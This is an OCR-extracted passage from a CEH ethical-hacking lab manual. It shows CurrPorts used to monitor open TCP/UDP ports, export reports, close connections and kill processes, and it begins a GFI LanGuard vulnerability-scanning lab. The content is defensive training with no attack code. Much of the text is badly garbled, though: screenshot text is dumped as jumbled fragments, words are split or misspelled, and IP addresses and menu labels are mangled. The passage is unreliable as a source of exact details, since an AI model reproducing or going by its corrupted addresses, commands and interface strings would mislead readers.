■ Close unwanted TCP connections and kill the process that opened the ports
C E H Lab M anual Page 103 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council AB Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t

To perform the lab, you need: ■ CurrPorts located at
D :\ C E H -T o o ls \ C E H v 8 M o d u le 0 3 S c a n n in g N e t w o r k s \ S c a n n in g T o o ls \ C u r r P o r t s

■ You can also download the latest version of http: / / www.nirsoft.11e t/utils/cports.html ■ If you decide to download the in the lab might differ

C u rrP o rts

from the link

la t e s t v e r s io n ,

then screenshots shown

■ A computer running W in d o w s CuuPorts tool from http://w w w .nirsoft.net.
a Y oucandow nload

S erv er 2012

■ Double-click c p o r t s .e x e to run this tool ■ Administrator privileges to run die
L a b D u r a t io n
C u rrP o rts

tool

Time: 10 Minutes
O v e r v ie w M o n it o r in g T C P / IP

Monitoring TCP/IP ports checks if there are m u ltip le IP connections established Scanning TCP/IP ports gets information on all die opened T C P and U D P ports and also displays all established IP addresses on die server.
Lab T asks

The CurrPorts utility is a standalone executable and doesn’t require any installation process or additional DLLs (Dynamic Link Library). Extract CurrPorts to die desired location and double click c p o r t s .e x e to launch.
TASK 1

1. Launch C u r r p o r t s . It a u t o m a t ic a lly d is p l a y s the process name, ports, IP and remote addresses, and their states.
C urrP orts
File Edit View Option* Help

D is c o v e r T C P /IP C o n n e c tio n

r‫ ־‬1 ‫ ״‬1 * ‫י‬

xSD®v^!taer4*a-*
Process Na.. ( T enrome.ere f
f

Proces...

Protocol TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP

L ocal... 4119 4120 4121 4123 414S 3981 3982 4013 4163 4166 4168 1070 1070 1028 1028

Loc-

Local Address 10.0.0.7 10.0.0.7 10.0.0.7 10.0.0.7 10.0.0.7 127.0.0.1 127.0.0.1 10.0.0.7 100.0.7 100.0.7 100.0.7 aaao

Rem... 80 80 80 80 443 3982 3981 443 443 443 443

Rem... h ttp h ttp h ttp h ttp https

R e rc te Address 173.194.36.26 173.194.3626 173.194.3626 215720420 173.194 3626 12700.1 12700.1

Remote Host Nam bcm04501 -in ‫־‬f26.1 bcmOisOl -in-f26.1 bom04501‫־‬in ‫־‬f26.1 a23-57-204-20.dep bom04501 -in-f26.1 WIN-D59MR5HL9F WIN-D39MR5HL9E bom01t01-in-f22.1 bom04!01 in ‫־‬f15.1 bcm04501 -in-f0.1« gra03s05in-f15.1e

2 m
2988 2988

<+1 rome.ere chrome.ere chrome.exe

2 m 2 m
1368 1368 1368 1368 1368 1368 1000 1800 564

CT chrome.exe ^ f i r t f c x ere

£ fir « fc x « x • (£ fir« fc x «(«
fircfcx.cxc f1 rcfcxc.cc

https h ttp j h ttp j h ttp ;

173.1943622 173.194.36.15 173.194.360 74.125234.15 0.0.0.0 = 0.0.0.0 =

firef cx c<c \s , httpd.exe \th ttp d .e x e Q lsass.occ

0.0.0.0

3 l» 5 5 a e 564 ____ »_____ <1 ■ 1 1

T
NirSoft Freeware. ht1p;/AnrA«v.rirsoft.net

>

7 9 ~ctal Ports. 2 1 Remote Connections. 1Selected

C E H Lab M anual Page 104

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

FIG U R E4.1 :T lieC urrP ortsm ainw indoww ithallprocesses, ports, andIPaddresses / /C urrPorts utilityis a standaloneexecutable, w hichdoesn't requireany installationprocess or additional D L L s. 2. CiirrPorts lists all die
n am e s. p ro ce sse s a n d r e m o te IP a d d r e s s ,

and their IDs, protocols used, lo c a l local and remote ports, and r e m o te h o s t
‫ >־‬H T M L R e p o r t s

3. To view all die reports as an HTML page, click V ie w
‫ ־‬A ll It e m s .
C urrP orts
File Edit I View | Options Help

M °- x ‫י‬

X B

1

Show Grid Lines Address ).7 ).7 ).7 ).7 ).7
.0.1

Process K J a1^ I Show Tooltips Mark Odd/Even Rows chrome. C* chromel HTML Report ‫ ־‬All I'errs ^ chrome. HTML Report - Selected terns C* chrome. Choose Columns ^ chromc.
(£ firc fc x .c
g f-e fc x e

Rem.. http http http http 443 3962 3981 443 443 443 443 https https https https https

Remote Address 173.1943526 173.194.3526 173.194.3526 23.5720420 173.194.3526 127.0.0.1 127.0.0.1 173.1943622 173.19436.15 173.19436.0 741252*4.15
0.0.0.0

Remote Host Nam *

bcmQ4s0l-in‫־‬ f 2 6 . 1 bcm04s0l-in-f26.1 bcm04s01 i n f 2 6 . 1
a23-57-204-20.dep S

bom04501-in‫־‬ f 2 6 . 1
WIN-D39MR5HL9E WIN-D39MR5HL9E bem04s01-in-f22.1 bom04i01‫־‬in*f15.1 bcm04s0l*in-f0.1< gruC3s05-1n‫־‬M5.1e

A uto Size Columns
R‫״‬fr#{h

F5 1l i TCP TCP TCP TCP TCP TCP TCP 4163
---

(p firc fo x .e 1 (c (B fa e fc x u e J ftfM c o ta e ® fr e fc x e te \h t t o d . e x e V h ttp d .e x e Q ls a s s e te

‫קז‬7‫ס‬ 1368 I368 1368 1800 1800 564 561

T V . V , 0 .7
10.0.0.7 10.0.0.7 100.0.7

.0.1

4 1 5 6
4158 1070 1070 1028 1028

o .a o .o
aaao

Q In thebottomleft of theC urrPorts w indow , the status of total ports and rem ote connections displays.

0 .0 .0 .0
NirSoft Freeware, http.//w w w .rirs o ft.n e t

79Tct«l Ports, 21 Remote Connection!, 1 Selected

FIG U R E4.2T heC urrPortsw ithH TM LR eport- A llItem s 4. The HTML Report
E<e Ldr View History Bookmarks 1001 ‫ צ‬Hdp I TCP/UDP Ports List ^ j j f j__ ' ‫־־־*־‬£• - Google P ^ ‫י‬ T C P /U D P P o r ts L is t =

a u t o m a t ic a lly

opens using die default browser.

( J f t e /// C;/User1/ Ad mini st ralor/Desfctop/ cp0fts-xt>£,repcriJit ml

countries of therem ote IP addresses, youhaveto dow nloadthelatest IPto C ountryfile. Y ouhaveto put the IpToC ountry.csv‫״‬ fileinthe sam efolder as cports.exe.

E3 To checkthe

C re a te d b v u sing C u rrP o rts

P m « j .Nam•

P ro titi ID 2988 2988 2988 2988 2988 2988 2988 2988 2988

P ro to co l

I.o ra l P o rt 4052 4059 4070 4071 4073 4083 4090 4103 4104

I A ra l P o rt X lB t

L o c a l A d d iv it

Remote P o rt 443 80 80 80 80 80 80 80 80

Rcm oU ‫׳‬ P o rt Name . https http http h ltp hup http hnp hup hnp 173 194 36 4 173.194.36.17 173.194.36.31 173.194.36.31 173.194.36.15 173.194.36.31 173.194.36.4 173.194.36.25 173 194 36 25 bo bo bo bo! boi bo! bo! bo bo > R tm v l« A d d r t it

chxame rx c chiome.exc ch101nc.exe daom e.exe daom e.exe daom e.exe cfcrorae.exe chfomc.cxc chrome exe

TCP TCP TCP TCP TCP TCP TCP TCP TCP

10 0 0 7 10.0.0.7 10.0.0.7 10.0.0.7 1 00.0.7 10.0.0.7 100.0.7 100.0.7 10 0 0 7

FIG U R E4 .3 :HieW ebbrow serd isp lay in gC urrP ortsR eport- A llItem s 5. To save the generated CurrPorts report from die web browser, click
F ile ‫ >־‬S a v e P a g e A s ...C t r l+ S .

C E H Lab M anual Page 105

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

TCP/UDP Ports List - Mozilla Firefox

‫ד‬3 5 ■
C i f ' Google

m C urrPorts allow syou to saveall changes (added andrem ovedconnections) into alogfile. In order to start w ritingto thelogfile, checkthe ,LogC hanges' optionunder the F ile m enu

‫ ו ז ק‬id *

« 1ry> Hitory

Bookmaikt Took Hrlp

fJcw l i b N*w‫’ ׳‬Mnd<*1* Cpen Fie..

CW*T Ctrt*N CcrUO
» f1 ‫׳‬Dcsttop/q)D1ts-x64/rEpor: html

P

*

S*.« Page As.. Ctr1*S Send LinkPag* Setup-. PrmtPi&Kw
E rrt.

!, r o t i f j j >111• ID chiom c.exe cfc10 me.exe chrome.exe chrome.exe chrome exe 2988 2988 2988 2988 2988 2988 2988 2988 2988

ti*

!'!‫ ־‬o to co l

!.o ra l P o rt 4052 4059 4070 4071 4073 408; 4090 4103 4104

I o r a l P o rt Name

Local A d d rv u

Remote P o ri 443 80 80 80 80 80 80 80 80

K em otc P o rt Name https http hnp http http http http http http 173.194.36.4 173.194.36.17 173.194.36.31 173.194.36.31 173 194 36 15 173 194 36 31 173 194 36 4 173.194.36.25 173.194.36.25 boj bo: bo: boi boi bo! boi boj b03 K e u io l* A d d n i t

TCP TCP TCP TCP TCP TCP TCP TCP TCP

10.0.0.7 10.0.0.7 10.0.0.7 10.0.0.7 100 0 7 100 0 7 100 0 7 10.0.0.7 10.0.0.7

2Z y"B ydefault, the logfile is savedas cports.loginthe sam e folder w here cports.exeis located. Y ou canchangethe default log filenam ebysettingthe L ogFilenam eentryinthe cports.cfgfile.

chrome exe ch*omc exe chiome.exe daom e.exe

FIG U R E4 .4 :T heW ebbrow sertoS av eC urrPortsR eport- A llItem s 6. To view only die selected report as HTML page, select reports and click
V ie w ‫ >־‬H T M L R e p o r t s ‫ ־‬S e l e c t e d Ite m s .
C urrP orts
File X S Edit | View | Options (3 Help

1-1° ‫ ׳‬x-

Show Grid L‫א חו‬ Show Tooltips Mark Odd/Even Rows HTML Report - All Items Address ).7 ).7 Rem... 80 80 80 80 445 3982 3981 443 443 443 443 https h ttp ; h ttp : https Rem... h ttp h ttp h ttp h ttp h ttp : Remote Address 175.19436.26 173.1943626 173.1943626 215720420 173.1943526 127.0.0.1 127JX011 173.1943622 173.194.36.15 173.194360 74125234.15 0.0.0.0 s 00.0.0 ___ AAA A 0.0.0.0 AAAA Hi1 Soft Freew are. http.‫׳‬,‫׳‬, w w w .r irsoft.net Remote Host Nam bom04s01-1n‫־‬f26.1 bom04s01-1n-f26.1 bcm04s01-in‫־‬f26.1f 323-57-204-20.dep bcm04s01-in-f26.1 WIN-D39MR5HL9E WIN-D39MR5HL9E bom04s01 -in-f22.1 bomOlsOl -in ‫־‬f1 5.1 bomOlsOI -in ‫־‬f0.1c gruC3s05 in -f 15.1c

Process Na P I

^ B e aw are! The logfile isupdatedonlyw henyou refreshtheports list m anually, orw henthe A utoR efreshoptionis turnedon.

C chrome.
C c h ro m e f

O'chrome “
® ,fir e fc x e (gfircfcxe: fircfcx e< v L f ircfox.cxc fircfcx.cxc ^ firc fc x .c x c httpd.exe httpd.exe Q lsa sse xe Q b a s te x e « -------a .--------

HTML Report ■ Selected terns Choose Columns Auto Size Columns

F

■0.7 P7 .0.1 .0.1 J>.7

Ctrl ♦■Plus F5

Refresh
1368 1368 1368 1000 1000 564 564 14nn TCP TCP TCP TCP TCP TCP TCP T rn 4163 4166 -4168 1070 1070 1028 1028 ‫י«׳*־ו־‬

1000.7 1000.7 100.0.7 0.0.0.0

79 ~ctel Ports. 21 Remote Connections, 3 Selected

clickonthe W ebpageand savethe report.

a Y oucanalsoright-

FIG U R E4 .5 :C urrPortsw ithH T M LR eport- S electedItem s
7. Tlie selected
re p o rt

automatically opens using the

d e fa u lt b r o w s e r .

C E H Lab M anual Page 106

E th ic a l H ackin g and Counterm easures Copyright O by EC-Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

TCP/UDP Ports List - Mozilla Firefox
ffi'g |d : Vico Hatory Bookmaiks Toob Help | + [ j TCP/UDP Ports List

I

1 ‫ ־‬n J~x

In the filters dialog bos, youcanaddone or m ore filter strings (separatedbyspaces, sem icolon, or C R L F ).

^

W c/'/C /lherv‫׳‬Admin 1strotor/Dr5fctop/'cport5‫־‬r64/rcpo‫די‬i« 0T1l

(?‫ ־‬Google |,f t I

P

T C P /V D P P o rts L is t

C reated b y m in g C iir r P o m

P rocess N am e
dbiome.cxc fire fo x exe h ttp d

P rocess
ID 2988 1368 1800

em o te o ca l Local K Local I> «m u t« R Port P rotocol Port Port A ddress Port N am e .N a m e
TCP TCP TCP 4148 4163 1070 10.0.0.7 10 0 0 7 443 443 https https

K vuiotc A ddress
173.194.36-26 173 194 36 15

R em o teH ost N am e
bom04sC 1 m. £26.1 e 100.net bom 04s01 tn - fl 5. Ie l0 0 .n e t

State
Established Established Listening

c:
C: C:

c x c

FIG U R E4 .6 :T heW ebbrow serd isp lay in gC uaPortsw ithH T M LR eport- S electedItem s / / The Syntaxfor Filter S tring: [include | exclude]: [local | rem ote | both | process]: [tcp | udp | tcpudp] : [IPR ange | Ports R ange]. 8. To save the generated CurrPorts report from the web browser, click
F ile ‫ >־‬S a v e P a g e A s ...C t r l+ S
TCP/‫׳‬UDP Ports List ‫ ־‬M ozilla Firefox Edfe Vir* N**‫׳‬T*b Open Fie... S*.« P a g e A ;. Sir'd linkPage :er.p. Pnnt Preview
P rm L .

‫׳‬

r= > r* ‫י‬

Hutory Boolvfmki Took HWp Clfl*T |+ |

an*N
Ctrl»0
Ctrl-S

1r/Desktop/cpo»ts x6Crepwthtml

fi

*

fic it Offline T o ral Local Local Po rt Pori Nam e A ddress TCP TCP TCP 4148 4163 1 0 0 0 .7 100.0.7 Rem ote Kcm ole Po rt Nam e https https

N am e
chtoxne.exe fiiefox-cxc http de xe

ID
2988 1368

Port
443 443

R em ote A ddress
1 73 .19 43 6 26 173.19436 15

Rem ote Ilo t l .N io it

boxu04s01 -ui-1‘26. Ie l0 0 .n e t bom04s01-1a-115.lel00.net

Established Established

C C

1 8 0 0

1 0 ‫׳‬0

‫ ש‬C om m and-line option: /stext < F 11enam e>m eans savethelist of all opened TCP/UDPports into a regular text file.

FIG U R E4 .7 :TheW ebb rcn v sertoSawQ irrPortsw ithH T M LR eport- S electedItem s 9. To view the
P r o p e r tie s . p r o p e r t ie s

of a port, select die port and click F ile

‫>־‬

C E H Lab M anual Page 107

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

r® 1 File J Edit I View Options Help C trM Ctri+T

C urrP orts

I - ] “

'

*

m

P N ctlnfo Close Selected TCP Connections Kill Processes Of Selected Ports Save Selected Items Properties

Local Address 10.0.0.7

Rem... 80 80 80 80 443 3982 3031 443 443

Rem.. http http http http https

Remote Address 173.194.3626 1‫׳־‬3.194.3626 1^3.194.36.26 23.57.204.20 1Ti 194.36.26 127.aa1 127.0L0L1

Remote Host Nam ‫ י׳‬1 bom04301 - in-f26.1 bom04501 ‫ ־‬in-f26.1 bom04s01-in-f26.1 a23*57204-20‫־‬.dep ■ bom 04s01-in-f2M WIN-D39MR5Hl9f WIM-D30MRSH10F bom04e01-m‫־‬f22.1 bom04s01-m-f15.1

CtiUS Alt^Entei C tiU P 1

10.0.0.7 10.0.0.7 10J3J3.7

/stab <Filenam e> m eans savethelist of all opened TCP/UDP ports intoa tab-delim itedtext file.

b&i C om m and-line option:

Process Properties Log Changes Open Log File Clear Log File Advanced Options Exit \ j 1 ttjd .e x e \h tto d .e x e □ lsass.exe 1800 1800 564 $64 TCP TCP TCP TCP

10.00.7 127.0.0.1 127.0.0.1 10.0.0.7

httpc https

1‫־‬ , 1 194.3622 173.194.3615

CtrU O

10.0.0.7

10.0.0.7
10.0.0.7 1070 1070 1028 1028

443
443

https
https

173.194.360
74.12523415

bom04s01 m‫־‬f0.1c
gru03s05-in‫־‬f15.1 e

oaao aao.o

0 D S )S ) ::
0D S J J J

Q lsass-exe

r. >
NirSoft Freeware, h ttp :'w w w .n irso ft.n e t

‫״‬

‫ ־‬T

|7 9 Tctel Ports, 21 Remote Connections, 1 Selected

FIG U R E4 .8 :C unPoitstoviewproperties foraselectedport 10. The P r o p e r t ie s window appears and displays all the properties for the selected port. 11. Click O K to close die
Process Nam e: Process ID: Protocol: Local Port: Local Port Nam e: Local Address: Remote Port: Remote Port Nam e: Remote Address: Remote Host Nam e: State: Process Path: Product Nam e: File Description: File Version: Com pany: Process Created O n: User Nam e: Process Services: Process Attributes: Added O n: Module Filename: Remote IP Country: Window Title:
P r o p e r t ie s

window
*

Properties firefox.exe
1368

TCP 4166 10.0.0.7 443 |https________________ 1 1 7 3 .194.36.0 bom 04s01-in-f0.1e100.net Established C:\Program Files (x86)\M 0zilla Firefox\firefox.exe Firefox Firefox 1 4 .0 .1 Mozilla Corporation 8/2 5 /2 0 1 2 2:36:28 PM WIN-D39MR5HL9E4\Administrator

C om m and-line option: /shtm l <Filenam e>m eans savethelist of all opened TCP/UDP ports into an H TM Lfile(H orizontal).

8/2 5 /2 0 1 2 3:32:58 PM

O K FIG U R E4 .9 :TheC urrPortsPropertiesw indowfortheselectedport

C E H Lab M anual Page 108

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

12. To close a TCP connection you think is suspicious, select the process and click F ile ‫ >־‬C lo s e S e l e c t e d T C P C o n n e c t io n s (or C trl+ T ).
S T A S K 2 C urrPorts

-_,»r

C lo s e T C P C o n n e c tio n
IPNetlnfo Close Selected TCP Connections Kill Processes Ctrt+1 C trl-T

‫ד‬

O fSelected Ports
CtH-S AH- Enter Ctrl— P

Local Address 10.0.0.7 10.0.0.7 10.0.0.7 10.0.0.7

Rem... 6

Rem... http http http http https

Remote Address 173.19436.26 173.19436.26 173.19436.26 23.5730430 173.19436.26 127.0.0.1 127.0.0.1

0

Remote Host Nam ‫ י ׳‬I bom04s01-in‫־‬f26.1 bom04s01-in‫־‬f26.1 bom04sC1 in-f26.1 023-57 204 2C.dep = bom04s01 in ‫־‬f26.1 WIN-D39MR5HL9e WIN-D39MR5HL9£ bom04s01 -in-f22.1 bom04s01-in-f15.1 bom04s01 ■in-f0.1s gru03s05-in-f151e

Save Selected Items Properties Process Properties Log Changes Cpen Log File Clear Log File A d/snced Options Exit ^ httpd.exe httpd.exe □ is a s s ^ x e Q toS fcC N e
^ J III

80 80 80

10.0.0.7 127.00.1 127.00.1 10.0.0.7 10.0.0.7

4 4 3
3932 3931

CtH+G

10.0.0.7 1£03 1800 564 564 TCP TCP TCP TCP ‫־‬r 1070 1070 1028 1Q28 om o 0D.0.0

4 4 3 4 4 3 4 4 3 4 4 3

http: https https https

173.19436.22 173.19436.15 173.19436.0 74.125.234.15 0.0.0.0 r o .a a o r

I> IlirSort fre e w a re . r-tto :‫׳‬v/Yv*/n rso tt.n et

7? Tot«! Porte, 21 Remote Connection! 1 Selected

J
‫ >־‬K ill

FIG U R E4 .1 0 : ,H ieC unPoitsC loseS electedT C PC onnectionsoptionw indow 13. To
k ill

the

p ro ce sse s

of a port, select die port and click F i le
C urrP orts

P r o c e s s e s o f S e l e c t e d P o r ts .

I ~ I ‫* 'ם‬

f i TASK 3
K ill P r o c e s s

File

j Edit

View

Options

Help

PNetlnfo
Close Selected TCP Connection* kin Processes Of Selected Ports 5ave Selected Items
P ro p e rties

a n ♦ !
C*rt*‫־‬T Loral Address 10.0.07 Clri-S A t-E n te r CtrKP 10.0.0.7 10.0.0.7 10.0.0.7 Rem... 80 80 80 80 443 3962 3981 443 443 443 443 https https https https Rem.. http http http http https Remote Addrect 173.14436.26 173.194.3626 173.194.3626 215720420 173.1943636 127.0.0.1 127.0.0.1 173.1943632 173.19436.15 173.19436.0 74125334.15
0.0.0.0

Remote Host Nam * bom04t01*in-f26.1 bomC4t01-in‫־‬f26.1 bomC4j01 -in-f26.1 a23-57-204-20.dep s bcmC4s01-in-f26.1 WIN-D39MR5HL9E WIN-D39MR5HL9E bomC4s01-in-f22.1 bom04s01‫־‬in‫־‬f15.1 bom04$0l‫־‬in‫־‬f0.1e gru03s05-1n-M5.1e

Process Properties Log Changes Open Log File Clear Log file Advanced Options Exit V httod.exe V h ttp d .e x e □ lw s s .e r e □ k a tc *re II 1800 1800 564 561 TCP TCP TCP TCP

10.0.0.7 127.0.0.1 127.0.0.1 10.0.0.7 10.0.07 10.0.0.7

1070 1070 1028 1028
___

O . Q . Q . O o .a a o
/ )A A A

10.0.0.7

‫ר‬

79 Tctel Ports, 21 Remote Connections, 1 Selected

MirSoft Freeware. http-Jta/ww.rirsoft.net

FIG U R E4 .1 1 :T heC urrP ortsK illP rocessesofS electedPortsO ptionW indow 14. To e x it from the CurrPorts utility, click F ile window c l o s e s .
‫ >־‬E x it .

The CurrPorts

C E H Lab M anual Page 109

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

C u rrP on s
File Edit View Options Help GH+I CtrK T .. Local Address 10.0.0.7 Ctifc-S A t-E a te r CtH«‫־‬P 10D.0.7 10.0.0.7 10.0.0.7 10.0.0.7 127.0.0.1 127.0.0.1 10.0.0.7 C tH -0 10.0.0.7 10.0.0.7 Ext \th ttp d .e x e \th ttp d .e x e Q lsa s& e xe H ls a is - a c ■ ‫־־‬ 1800 1800 564 564 TCP TCP TCP TCP rrn 1070 1070 1028 1028 __ /‫ ו‬a / \ a Rem.. 80 80 80 80 443 3082 3981 443 443 443 443 https https https https Rem‫״‬ http http http http httpt Remcte Address 173.194.36.26 173.194.3626 173.1943626 21 57.204.20 173.194.3626 127.0.0.1 127X10.1 173.19436.22 173.194.36.1S 173.194.36i) 74.125.234.15 0.0.0.0 = 0.0.0.0 = AAAA Nil Soft free were. Mtpy/vvwvv.r it soft.net

1-1° ‫ ׳‬- ’

P N etlnfo Close Selected TCP Connections K il Processes O f Selected Ports

Remcte Host Nam bom04s01-in-f26.1 bom04s01-in-f26.1 bom04s01-in‫־‬f26.1r a23-57-204-20.de

/sveihtm l <Filenam e> S avethelist of all opened TCP/UDP ports into H TM Lfile(V ertical).

hid C om m and-line option:

Save Selected Items Properties Procccc Properties lo g Changes Open Log File Clear Log File Advanced O ption!

J

bom04t01-in-f26.1| WIN-D3QMR5H19P WIN-039MR5HL9E bomC4101-in-f22.1 bemC4i01 in ‫־‬f15.1 bcmC4s01 in f0.1q gru03s05in-f15.1e

1

10.0.0.7 0.0.0.0 = 0.0.00

79 ‫ ז‬ctal Ports. 21 Remote Connections. 1 Selected

FIG U R E4 .1 2 :T heC urrPoitsE xit optionw indow
L a b A n a ly s is

Document all die IP addresses, open ports and their running applications, and protocols discovered during die lab. feU IIn com m andline, the syntaxof /close com m and:/close <L ocal A ddress> <Local Port> <R em oteA ddress> <R em ote Port‫* נ‬. Tool/U tility Information Collected/Objectives Achieved Profile Details: Network scan for open ports Scanned Report: ■ Process Name ■ Process ID ■ Protocol ■ Local Port ■ Local Address ■ Remote Port ■ Remote Port Name ■ Remote Address ■ Remote Host Name

CurrPorts

C E H Lab M anual Page 110

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

P L E A S E T A L K TO YO UR IN S T R U C T O R IF YOU H A V E Q U ES T IO N S R E L A T E D TO TH IS LAB.

Q u e s t io n s

Q C urrPorts allow s you toeasilytranslate all m enus, dialogboxes, and strings to other languages.

1 . Analyze the results from CurrPorts by creating a filter string that displays

only packets with remote TCP poit 80 and UDP port 53 and running it. Analyze and evaluate die output results by creating a filter that displays only die opened ports in die Firefox browser.
‫ כ‬.

Determine the use of each of die following options diat are available under die options menu of CurrPorts: a. Display Established b. Mark Ports Of Unidentified Applications c. Display Items Widiout Remote Address d. Display Items With Unknown State

Internet Connection Required □ Yes Platform Supported 0 Classroom 0 !Labs 0 No

C E H Lab M anual Page 111

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab

S c a n n in g f o r N e tw o rk V u ln e r a b ilitie s U s in g t h e G F I L a n G u a rd 2 0 1 2
G F I L A N g w r d s c a n s n e tw o rk s a n d p o r ts to d e te c t, a s s e s s , a n d c o rre c t a n y s e c u rity v u ln e r a b ilitie s th a t a re fo u n d .

I CON K E Y
Valuable information ✓ Test your knowledge Web exercise

L a b S c e n a r io

You have learned in die previous lab to monitor T C P IP and U D P ports 011 your local computer or network using C u rrP o rts. This tool will automatically mark widi a pink color suspicious TCP/UDP ports owned by u n id e n tifie d applications. To prevent attacks pertaining to TCP/IP; you can select one or more items, and dien close die selected connections. Your company’s w e b s e r v e r is hosted by a large ISP and is well protected behind a firewall. Your company needs to audit the defenses used by die ISP. After starting a scan, a serious vulnerability was identified but not immediately corrected by the ISP. All evil attacker uses diis vulnerability and places a b a c k d o o r on th e s e rv e r. Using die backdoor, the attacker gets complete access to die server and is able to manipulate the information 011 the server. The attacker also uses the server to le a p fro g and attack odier servers 011 the ISP network from diis compromised one. As a s e c u r it y a d m in is tra to r and p e n e tra tio n t e s t e r for your company, you need to conduct penetration testing in order to determine die list of t h r e a t s and v u ln e r a b ilitie s to the network infrastructure you manage. 111 diis lab, you will be using G F I L a n G u a rd 2 0 1 2 to scan your network to look for vulnerabilities.
L a b O b j e c t iv e s

Q

Workbook review

Z U T o o ls d e m o n stra te d in t h is la b a r e a v a ila b le in D:\CEHT o o ls\ C E H v 8 M o du le 0 3 S c a n n in g N e tw o rk s

The objective of diis lab is to help students conduct vulnerability scanning, patch management, and network auditing.
111

diis lab, you need to: ■ Perform a vulnerability scan

C E H Lab M anual Page 112

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

■ Audit the network ■ Detect vulnerable ports ■ Identify security vulnerabilities Q Y oucandow nload GFI L A N guard from http://w w w gfi.com . ■ Correct security vulnerabilities with remedial action
L a b E n v ir o n m e n t

To perform die lab, you need: ■ GFI Languard located at D :\C EH -T o o ls\C E H v 8 ■ You can also download the latest version of link http://www.gfi.com/la1111etsca11 ■ If you decide to download the in the lab might differ
M o d u le 0 3 S c a n n in g N e tw o rk sW u ln e ra b ility S c a n n in g T o o ls\G F I L a n G u a rd G F I L a n g u a rd

from the

la t e s t v e r s io n ,

then screenshots shown

■ A computer running W in d o w s ■ Q G FI L A N guard com patiblyw orks on M icrosoft W indow s Server 2008Standard/Enterprise, W indow s Server 2003 Standard/E nterprise, W indow s 7U ltim ate, M icrosoft S m all B usiness Server 2008Standard, S m all B usiness Server 2003 (S P 1), and S m all B usiness Server 2000(S P 2).
W in d o w s S e r v e r 2 0 0 8 running

2012 S e rv e r

as die host machine

in virtual machine

■ Microsoft ■NET F r a m e w o r k
Scann er

2 .0 LA N g u a rd N e tw o rk S e c u r it y

■ Administrator privileges to run die G F I

■ It requires die user to register on the G F I w e b s it e http: / / www.gfi.com/la1111etscan to get a lic e n s e k e y ■ Complete die subscription and get an activation code; the user will receive an e m a il diat contains an a c tiv a tio n c o d e
L a b D u r a t io n

Time: 10 Minutes
O v e r v ie w o f S c a n n in g N e t w o r k

C-J GFI L A N guard includesdefault Security scans or audits enable you to identify and assess possible r is k s within a configuration settings that network. Auditing operations imply any type of c h e c k in g performed during a allowyoutorun im m ediate scans soonafter the network security audit. These include o p e n port checks, missing Microsoft p a t c h e s installationis com plete. and v u ln e ra b ilitie s , service infomiation, and user or p r o c e s s information.

As an administrator, you often have to deal separately widi problems related to v u ln e ra b ility issues, p a tc h m a n a g e m e n t, and network au d itin g . It is your responsibility to address all die viilnerability management needs and act as a virtual consultant to give a complete picture of a network setup, provide r is k a n a ly s is , and maintain a secure and c o m p lia n t n e tw o rk state faster and more effectively.

C E H Lab M anual Page 113

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council AB Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab T asks

Follow die wizard-driven installation steps to install die GFI LANguard network scanner on die host machine windows 2012 server.
B TASK 1

1. Navigate to W in d o w s S e r v e r 2 0 1 2 and launch the S t a r t menu by hovering the mouse cursor in the lower-left corner of the desktop

S c a n n in g for V u ln e r a b ilitie s

Zenm ap fileinstalls the follow ingfiles: ■N m apC ore F iles ■N m apPath ■W inPcap 4 .1.1 ■N etw orkInterface Im port ■ Zenm ap (G U I frontend) ■N eat (M odernN etcat) ■N diff

FIG U R E5 .1 :W indow sS erver2012- D esktopview 2. Click the window
G F I L an G u ard 2 0 1 2

app to open the

G FI L an G u ard 2 0 1 2

Windows Marager

Google

bm

r
Nnd

*

V

e

FT‫־‬

£

SI

2)12

0

FIG U R E5.2W indow sS erver2012- A pps 3. The GFI LanGuard 2012 m ain A u d it tab contents. / / To executeascan successfully, G FI LA N guardm ust rem otely logonto target com puters w ithadm inistrator privileges.
w in d o w

appears and displays die N e tw o rk

C E H Lab M anual Page 114

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

GFI LanGuard 2012 I -| dashboard Seen Remedy ActMty Monitor Reports Configuration UtSties
W D13CIA3 this ■ ‫י‬

W elcome to GFI LanG uard 2012
GFI LanGuard 2012 is ready to audit your network fc* rtireta&dites

Local Computer Vulnerability Level

options w hichprovide quickaccess to scanning m odes are: ■Q uickscan ■ Full scan ■ Launcha customscan ■ Set up aschedule scan

e a The default scanning

us• ‫־‬ Nana9#*gents‫־‬or Launch a scan‫ ־‬options 10 , the entile network.

JP 9 %

V ie w D a s h b o a rd Inve30gate netvuor*wjinerawiir, status and audi results

M <
{ 'M o w — iim jIW - .

R e m o diate S e cu rity Iss u e s Deploy missing patches uninstaiwwuihortwd *!*rare. turn on onllvirus and m ore

c a f h 'e .

Cunent Vulnerability Level is: High

